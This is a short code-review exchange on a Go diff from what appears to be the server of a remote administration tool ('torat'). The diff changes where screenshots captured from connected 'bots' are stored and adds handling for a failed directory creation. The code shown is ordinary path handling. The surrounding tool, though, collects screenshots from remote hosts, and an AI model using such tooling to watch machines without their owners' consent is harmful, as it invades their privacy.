torat_server/client_ishell.go

```diff
@@ -218,7 +218,17 @@ func (client *activeClient) Screen(c *ishell.Context) {
 		return
 	}
 
-	err := ioutil.WriteFile(filepath.Join(client.Client.Path, filename), r, 0600)
+	dlPath := filepath.Join("/dist_ext/bots/", client.Client.Hostname, "/screenshots/", filename)
+	dlDir, _ := filepath.Split(dlPath)
+
+	if err := os.MkdirAll(dlDir, os.ModePerm); err != nil {
+		c.ProgressBar().Final(green("[Server] ") + red("[!] Could not create screenshots path!"))
```

Comment:
c.ProgressBar().Final(green("[Server] ") + red("[!] Could not create screenshots path:", err))

Reply:
Let's save this for my major patch where we change all these. There are like ~25 instances of this

Reply:
ok